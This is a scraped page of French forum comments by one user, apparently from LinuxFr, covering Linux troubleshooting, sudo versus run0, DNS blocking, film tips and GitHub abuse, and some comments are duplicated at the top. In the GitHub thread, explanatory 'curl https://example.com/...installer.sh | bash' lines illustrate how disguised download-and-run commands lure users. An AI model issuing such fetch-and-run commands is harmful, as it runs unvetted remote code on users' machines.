Je ne sais pas si c'est ce que tu as testé, mais DeltaChat m'a l'air approprié pour ce cas d'usage, si vraiment Signal sans téléphone c'est impossible.
Ça me fait furieusement penser à un home directory qui n'a plus les bons droits, ou qui a disparu, ou les paquets de l'env de bureau/le window manager corrompu ou enlevé, ou encore le gestionnaire de fenêtre sélectionné n'est plus là, un .xsessionrc pas bon.
Ça peut aussi être un truc entre Wayland et Xorg, par exemple le gestionnaire de login est en Wayland, et l'env de bureau en Xorg (ou l'inverse), et seul l'un des deux est fonctionnel.
En passant en console texte (avec ctrl-alt-f3 par exemple), tu peux essayer de te loger, et si ça fonctionne, tu pourras au moins aller voir les logs et avancer sur la cause.
J'ai vu de la lumière, je me permet… Avoir tes machines derrière un reverse proxy, placé dans une zone tampon vulgairement nommée DMZ, me semble au contraire une bonne idée en terme de sécurité.
Les flux entrants passent par un reverse proxy, les flux sortants passent par un proxy classique. Ainsi tes serveurs ne parlent pas directement avec l'hostile Internet, IPv4 ou IPv6.
Je pense au contraire que le grand public n'a pas la moindre idée du prix des choses en général. Tu sais combien tu as payé la dernière fois, combien ça coûte sur le marché, mais il y a un manque flagrant d'information qui fait que tu ne peux pas évaluer vraiment.
C'est particulièrement flagrant pour les impôts en France. Mais il y a un remède à ça : tu vas aux États-Unis d'Amérique, et te casses le bras, une belle fracture pas trop grave, tu empruntes 20000$ pour payer l'hôpital. Tu reviens en France et jamais plus tu ne te plains de payer trop d'impôts :).
Perso je trouve intéressant de questionner les piles de trucs qu'on considère comme normaux sous Unix/Linux, et qu'on conserve comme un héritage précieux. Parfois c'est juste un hack qui contourne une limitation transformé en relique sacrée. Il y a quelques trucs bien qui ressortent du coup de pied dans la fourmilière que représente systemd1.
Donc, changer sudo par autre chose. Pourquoi ? Avoir une granularité plus grande dans les fonctions exécutables en root, et contourner la flemme intersidérale qui fait qu'on termine trop souvent avec un (ALL : ALL) NOPASSWD: ALL dans le sudoers.
Toutefois, ici, le remplacement est d'une complexité bien plus grande que sudo ! La configuration fine se fait par des snippets de configuration Polkit, qui ne sont autre que des fichiers XML qui font référence à des actions encodées dans d'autres fichiers XML, qui correspondent à des interfaces type org.freedesktop.machine1.host-login. Écrire un fichier polkit est un vrai sujet en soi.
Bref, je trouve la question de la gestion des droits admin légitime, mais la solution proposée un peu moyenne car finalement plus complexe. Peut-être que pour un usage de bureau c'est un mal nécessaire.
Au final, peut-être que l'intérêt de tout ça est d'arriver à standardiser la gestion des droits au travers des interfaces freedesktop.
Ma conclusion pour mon usage est que je vais suivre run0 de loin, et si ça donne un truc intéressant, je raccrocherai les wagons.
les logs binaires, qui permettent de chercher par date sans avoir le gros doute sur la timezone ou du format de date, sont un bon exemple de truc bien (c'est mon avis en tout cas :)). ↩
Ces dernières années, pour des films Français vraiment supers, ou simplement sympa à regarder, dans des genre assez différents, je pourrais te conseiller, sans ordre particulier :
Portrait de la jeune fille en feu
Anatomie d'une chute
Le règne animal
Adieu les cons
À plein temps
Annie colère
En corps
Dheepan (bon 9 ans, ça commence à dater)
En série, je n'ai pas vu grand chose, mais ces deux-ci sont chouettes :
Le monde de demain (Arte, sur les débuts du hop-hop en France)
Polar Park (Arte aussi, un polar loufoque)
Sur Youtube, la mini-série Umoristique Les terroristes du quotidien est sympa, mais l'épisode Le mec qui comprend pas les exemples est sur le dessus du panier.
En pas Français mais d'Europe, il y a l'excellent Woman at war de Benedikt Erlingsson, et la série dano-suédoise Bron/Broen (The Bridge).
Entre le conte et le jeu vidéo, en production nord-américaine, tu pourrais aimer Riddle of Fire (Conte de feu).
Ce n'est pas suffisant, heureusement, mais en recoupant plusieurs éléments, tu peux monter un dossier (voir le blog de Zythom, d'ailleurs, c'est passionnant). Ça demande sans doute des moyens colossaux, qui seraient peut-être mieux utilisés dans la mise en place et le financement d'une licence globale, par exemple.
Tu as raison. Mais justement la réflexion de l'ARCOM, et sans doute d'autres institutions, est de voir comment limiter l'impact du contournement des mesures mise en place en France, par exemple en obligeant les opérateurs de VPN ou de DNS de tous les pays à conserver les logs et à devoir les fournir aux agences genre Hadopi en cas d'enquête. Pour le faire niveau mondial, bonjour.
C'est encore une bonne démonstration que mettre en place des mesures techniques (DNS menteur) pour régler un problème social (le piratage) ne fonctionne pas.
Sudo permet aussi de donner les droits vers un autre utilisateur que root. On peut parfois s'en sortir avec suid mais c'est beaucoup moins granulaire.
Par exemple avec sudo, tu peux donner le droit à l'utilisateur de l'agent zabbix de lancer des commandes précises en tant que root, pour interroger du matériel par exemple (comme voir l'état d'un volume raid mais sans autoriser la destruction du volume pour autant). Ou pour récupérer les stats d'une base mariadb avec le user mariadb.
Il y a plein de situations où c'est très pratique. Je ne saurais m'en passer :).
Par contre, oui, donner le shell root comme c'est le cas à trop d'endroits, c'est souvent dispensable.
Posté par cg .
En réponse au lien /dev/null as Service.
Évalué à 5 (+3/-0).
Dernière modification le 27 avril 2024 à 09:36.
C'est ringard ces technos, le script one-less-to-go.sh devrait être réécrit en Rust ou en Zig.
Et la sélection du fichier devrait être faite à partir du service Random-as-a-Service, pas avec shuf, ça introduit une dépendance système à coreutils inutile sinon.
En plus il n'y a pas d'API Serverless, le comble pour un service Useless.
Dommage car j'avais plein de données à supprimer, je vais devoir racheter un nouveau NAS 200To.
On peut quand même leur accorder qu'ils ont un bon succès, témoin cette prochaine IPO montée dans le plus grand secret avec l'excellent Dumpser-Diving-as-a-Service (DDaaS).
Ceci étant, ce n'est pas forcément critique de perdre des pièces jointes dans un commentaire, mais bon, il doit bien y avoir des cas où ça ne fonctionne pas. Je souhaite bien du courage à GitHub pour ce petit casse-tête !
Je suis d'accord et pas d'accord avec toi que le terme est tangent. Ce n'est pas une faille technique, mais ça exploite une faille humaine. Quand on voit comment ça se passe avec le phishing par mail, c'est plutôt astucieux. On nous habitue à vérifier les URLs dans les mails, etc… Et là ça fait des URLs toutes jolies.
Il n'y a pas de mécanisme permettant de différencier qu'un fichier a été déposé par un membre du projet vs une personne random. Une petite icône à côté des fichiers posés par un tiers peut mitiger le problème, par exemple, ou un schéma un peu différent.
Exemple :
Pour installer la police de caractères ScreamingTurtle utilisée par YoupiScanner, faites simplement :
[^] # Re: Gittea
Posté par cg . En réponse au journal Serveur Git perso via SSH. Évalué à 3 (+1/-0).
Si tu veux améliorer un poil :
au lieu de :
faire :
Tous ces trucs qu'un gestionnaire de paquet fait gratos ;).
[^] # Re: Rien, c’est juste que le TIOBE Index est pété, comme toujours
Posté par cg . En réponse au lien TIOBE Index for May 2024: Fortran in the top 10, what is going on?. Évalué à 5 (+3/-0).
Ouais, j'avoue que Delphi en #11 et Scratch en #17 juste devant Rust ça laisse songeur…
Le TIOBE serait en fait un superbe exemple de « corrélation n'est pas causalité » ?
# Deltachat ?
Posté par cg . En réponse au message Messagerie smartphone <-> linux. Évalué à 9 (+7/-0).
Je ne sais pas si c'est ce que tu as testé, mais DeltaChat m'a l'air approprié pour ce cas d'usage, si vraiment Signal sans téléphone c'est impossible.
# Essayer de se loger en console
Posté par cg . En réponse au message Mot de passe en boucle. Évalué à 3 (+1/-0).
Ça me fait furieusement penser à un home directory qui n'a plus les bons droits, ou qui a disparu, ou les paquets de l'env de bureau/le window manager corrompu ou enlevé, ou encore le gestionnaire de fenêtre sélectionné n'est plus là, un
.xsessionrc
pas bon.Ça peut aussi être un truc entre Wayland et Xorg, par exemple le gestionnaire de login est en Wayland, et l'env de bureau en Xorg (ou l'inverse), et seul l'un des deux est fonctionnel.
En passant en console texte (avec ctrl-alt-f3 par exemple), tu peux essayer de te loger, et si ça fonctionne, tu pourras au moins aller voir les logs et avancer sur la cause.
# Idée
Posté par cg . En réponse au message Clavier PC portable. Évalué à 3 (+1/-0).
Peut-être que la fonction "Fn Lock" est activée ?
Sur les Dell c'est avec la touche Fn+Esc, et c'est persistant d'un reboot à l'autre.
# Rachat des IPv4
Posté par cg . En réponse au message Reverse proxy pour rendre accessible en IPv4 un service IPv6. Évalué à 4 (+2/-0).
Il semble que tu n'es pas le premier à avoir l'idée : Cogent se sert de la valeur des IPv4 comme garantie financière :).
# Au passage
Posté par cg . En réponse au message Reverse proxy pour rendre accessible en IPv4 un service IPv6. Évalué à 4 (+2/-0).
J'ai vu de la lumière, je me permet… Avoir tes machines derrière un reverse proxy, placé dans une zone tampon vulgairement nommée DMZ, me semble au contraire une bonne idée en terme de sécurité.
Les flux entrants passent par un reverse proxy, les flux sortants passent par un proxy classique. Ainsi tes serveurs ne parlent pas directement avec l'hostile Internet, IPv4 ou IPv6.
[^] # Re: Question pour le DNS
Posté par cg . En réponse au lien L'ARCOM s'interroge sur le détournement des VPN et DNS à des fins illicites. Évalué à 8 (+6/-0).
C'est particulièrement flagrant pour les impôts en France. Mais il y a un remède à ça : tu vas aux États-Unis d'Amérique, et te casses le bras, une belle fracture pas trop grave, tu empruntes 20000$ pour payer l'hôpital. Tu reviens en France et jamais plus tu ne te plains de payer trop d'impôts :).
[^] # Re: Conf Polkit pour remplacer sudo
Posté par cg . En réponse au lien Lennart veut remplacer sudo par run0 dans SystemD. Évalué à 9 (+7/-0).
Pardon j'ai écrit une bêtise : les actions de Polkit sont bien en XML, mais les règles sont en JavaScript.
# Conf Polkit pour remplacer sudo
Posté par cg . En réponse au lien Lennart veut remplacer sudo par run0 dans SystemD. Évalué à 10 (+12/-0).
(note: le sujet "sudo pas bien, run0 bien" est aussi abordé ici : sudo" is very very useful […] sudo has serious problems though).
Perso je trouve intéressant de questionner les piles de trucs qu'on considère comme normaux sous Unix/Linux, et qu'on conserve comme un héritage précieux. Parfois c'est juste un hack qui contourne une limitation transformé en relique sacrée. Il y a quelques trucs bien qui ressortent du coup de pied dans la fourmilière que représente systemd1.
Donc, changer sudo par autre chose. Pourquoi ? Avoir une granularité plus grande dans les fonctions exécutables en root, et contourner la flemme intersidérale qui fait qu'on termine trop souvent avec un
(ALL : ALL) NOPASSWD: ALL
dans le sudoers.Toutefois, ici, le remplacement est d'une complexité bien plus grande que sudo ! La configuration fine se fait par des snippets de configuration Polkit, qui ne sont autre que des fichiers XML qui font référence à des actions encodées dans d'autres fichiers XML, qui correspondent à des interfaces type
org.freedesktop.machine1.host-login
. Écrire un fichier polkit est un vrai sujet en soi.Bref, je trouve la question de la gestion des droits admin légitime, mais la solution proposée un peu moyenne car finalement plus complexe. Peut-être que pour un usage de bureau c'est un mal nécessaire.
À comparer à d'autres solutions comme les capabilities (et aussi Root As Role)
Au final, peut-être que l'intérêt de tout ça est d'arriver à standardiser la gestion des droits au travers des interfaces freedesktop.
Ma conclusion pour mon usage est que je vais suivre run0 de loin, et si ça donne un truc intéressant, je raccrocherai les wagons.
les logs binaires, qui permettent de chercher par date sans avoir le gros doute sur la timezone ou du format de date, sont un bon exemple de truc bien (c'est mon avis en tout cas :)). ↩
[^] # Re: Arcom est dit
Posté par cg . En réponse au lien L'ARCOM s'interroge sur le détournement des VPN et DNS à des fins illicites. Évalué à 6 (+4/-0).
Ces dernières années, pour des films Français vraiment supers, ou simplement sympa à regarder, dans des genre assez différents, je pourrais te conseiller, sans ordre particulier :
En série, je n'ai pas vu grand chose, mais ces deux-ci sont chouettes :
Sur Youtube, la mini-série Umoristique Les terroristes du quotidien est sympa, mais l'épisode Le mec qui comprend pas les exemples est sur le dessus du panier.
En pas Français mais d'Europe, il y a l'excellent Woman at war de Benedikt Erlingsson, et la série dano-suédoise Bron/Broen (The Bridge).
Entre le conte et le jeu vidéo, en production nord-américaine, tu pourrais aimer Riddle of Fire (Conte de feu).
[^] # Re: Question pour le DNS
Posté par cg . En réponse au lien L'ARCOM s'interroge sur le détournement des VPN et DNS à des fins illicites. Évalué à 7 (+5/-0).
Ce n'est pas suffisant, heureusement, mais en recoupant plusieurs éléments, tu peux monter un dossier (voir le blog de Zythom, d'ailleurs, c'est passionnant). Ça demande sans doute des moyens colossaux, qui seraient peut-être mieux utilisés dans la mise en place et le financement d'une licence globale, par exemple.
[^] # Re: Question pour le DNS
Posté par cg . En réponse au lien L'ARCOM s'interroge sur le détournement des VPN et DNS à des fins illicites. Évalué à 8 (+6/-0).
Tu as raison. Mais justement la réflexion de l'ARCOM, et sans doute d'autres institutions, est de voir comment limiter l'impact du contournement des mesures mise en place en France, par exemple en obligeant les opérateurs de VPN ou de DNS de tous les pays à conserver les logs et à devoir les fournir aux agences genre Hadopi en cas d'enquête. Pour le faire niveau mondial, bonjour.
C'est encore une bonne démonstration que mettre en place des mesures techniques (DNS menteur) pour régler un problème social (le piratage) ne fonctionne pas.
[^] # Re: sudo vraiment nécessaire?
Posté par cg . En réponse au lien « "sudo" is very very useful […] sudo has serious problems though » : systemd sudo. Évalué à 10 (+9/-0).
Sudo permet aussi de donner les droits vers un autre utilisateur que root. On peut parfois s'en sortir avec suid mais c'est beaucoup moins granulaire.
Par exemple avec sudo, tu peux donner le droit à l'utilisateur de l'agent zabbix de lancer des commandes précises en tant que root, pour interroger du matériel par exemple (comme voir l'état d'un volume raid mais sans autoriser la destruction du volume pour autant). Ou pour récupérer les stats d'une base mariadb avec le user
mariadb
.Il y a plein de situations où c'est très pratique. Je ne saurais m'en passer :).
Par contre, oui, donner le shell root comme c'est le cas à trop d'endroits, c'est souvent dispensable.
[^] # Re: Vieilles technos
Posté par cg . En réponse au lien /dev/null as Service. Évalué à 2 (+0/-0).
Un remote dd pour copier des fichiers ? Malheureux ! Tout l'enjeu est de s'en débarrasser :).
DDaaS (Dumpster Diving as a Service) c'est le moteur de recherche dans les poubelles, utilisé par les partenaires comme expliqué dans Privacy.
Et puis pour
<
, merci mais si en plus faut installer un shell, c'est l'usine à Gaz (UaGaaS ?)…# Vieilles technos
Posté par cg . En réponse au lien /dev/null as Service. Évalué à 5 (+3/-0). Dernière modification le 27 avril 2024 à 09:36.
C'est ringard ces technos, le script
one-less-to-go.sh
devrait être réécrit en Rust ou en Zig.Et la sélection du fichier devrait être faite à partir du service Random-as-a-Service, pas avec
shuf
, ça introduit une dépendance système àcoreutils
inutile sinon.En plus il n'y a pas d'API Serverless, le comble pour un service Useless.
Dommage car j'avais plein de données à supprimer, je vais devoir racheter un nouveau NAS 200To.
On peut quand même leur accorder qu'ils ont un bon succès, témoin cette prochaine IPO montée dans le plus grand secret avec l'excellent Dumpser-Diving-as-a-Service (DDaaS).
# Autre article
Posté par cg . En réponse au lien Les passkeys, nouvelle arme des Big Tech pour enfermer les internautes dans leurs écosystèmes ?. Évalué à 2 (+0/-0).
Le billet de blog Passkeys: A Shattered Dream par l'auteur principal de la bibliothèque webauthn-rs est très intéressant. (par contre c'est en Anglais)
[^] # Re: Souvent oui
Posté par cg . En réponse au message Fichier d'installation. Évalué à 3 (+1/-0).
C'est peut-être que tu retires le support trop tôt, ou alors c'est un bug de l'installeur qui cherche à écrire un dernier log.
# Sauvons SAFE_FREE !
Posté par cg . En réponse au journal Traduction | Doit-on vérifier le pointeur pour NULL avant d'appeler la fonction free ?. Évalué à 10 (+12/-0).
Tada :o) !
# Souvent oui
Posté par cg . En réponse au message Fichier d'installation. Évalué à 5 (+3/-0).
Oui, par exemple dans Debian et ses dérivés, il y a un répertoire
/var/log/installer/
qui contient tout ce qu'il s'est passé pendant l'installation.[^] # Re: faille?
Posté par cg . En réponse au lien Des hackers profitent d'une faille technique de GitHub pour diffuser leur malware. Évalué à 7 (+5/-0).
Oui c'est vrai, ça semble logique.
Ceci dit, si un utilisateur supprime son compte, que devient le fichier ? Le lien doit être banalisé genre "https://github.com/deleted-user-{UUID_de_l_utilisateur_supprimé}/files/{identifiant_du_fichier}/{nom_du_fichier}".
Ceci étant, ce n'est pas forcément critique de perdre des pièces jointes dans un commentaire, mais bon, il doit bien y avoir des cas où ça ne fonctionne pas. Je souhaite bien du courage à GitHub pour ce petit casse-tête !
[^] # Re: faille?
Posté par cg . En réponse au lien Des hackers profitent d'une faille technique de GitHub pour diffuser leur malware. Évalué à 7 (+5/-0).
Je suis d'accord et pas d'accord avec toi que le terme est tangent. Ce n'est pas une faille technique, mais ça exploite une faille humaine. Quand on voit comment ça se passe avec le phishing par mail, c'est plutôt astucieux. On nous habitue à vérifier les URLs dans les mails, etc… Et là ça fait des URLs toutes jolies.
Il n'y a pas de mécanisme permettant de différencier qu'un fichier a été déposé par un membre du projet vs une personne random. Une petite icône à côté des fichiers posés par un tiers peut mitiger le problème, par exemple, ou un schéma un peu différent.
Exemple :
Pour installer la police de caractères ScreamingTurtle utilisée par YoupiScanner, faites simplement :
curl https://example.com/microsoft/msfonts/files/abc123def456/screamingturtle-font-installer.sh | bash
1Si l'URL était comme ceci :
curl https://example.com/microsoft/msfonts/comments-uploads/files/abc123def456/screamingturtle-font-installer.sh | bash
peut-être que dans 2% des cas on ne download pas le fichier.
rien de tel qu'un
curl | bash
pour mettre tout le monde d'accord :D ↩[^] # Re: waouch.
Posté par cg . En réponse au lien Une petite ville française paralysée par une cyberattaque qui prive les habitants de leurs services . Évalué à 2 (+0/-0).
Ça devrait te parler : RETEX Incident de sécurité au CHU de Brest.
Attention, âmes sensibles s'abstenir !
# Petit guide
Posté par cg . En réponse au lien Une petite ville française paralysée par une cyberattaque qui prive les habitants de leurs services . Évalué à 10 (+8/-0).
Le petit guide "mais que faire en cas d'attaque".
[^] # Re: Réactionnaire
Posté par cg . En réponse au lien « Impact catastrophique » : le gouvernement explore le bannissement des smartphones des collèges . Évalué à 4 (+2/-0).
C'est ambigu :
(un peu en avance sur le trolldi, désolé)